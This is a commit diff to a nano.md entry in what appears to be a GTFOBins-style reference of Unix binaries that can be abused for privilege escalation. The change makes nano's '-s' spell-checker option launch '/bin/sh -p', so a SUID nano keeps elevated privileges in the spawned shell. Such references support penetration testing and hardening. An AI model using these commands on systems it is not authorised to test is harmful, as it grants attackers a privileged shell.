Update nano.md

This commit is contained in:
gerbsec 2024-05-14 12:08:26 -04:00 committed by GitHub
parent 97f46f1526
commit 99682a4d15
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -20,8 +20,8 @@ functions:
limited-suid: limited-suid:
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed. - description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: | code: |
./nano -s /bin/sh ./nano -s "/bin/sh -p"
/bin/sh /bin/sh -p
^T ^T
sudo: sudo:
- code: | - code: |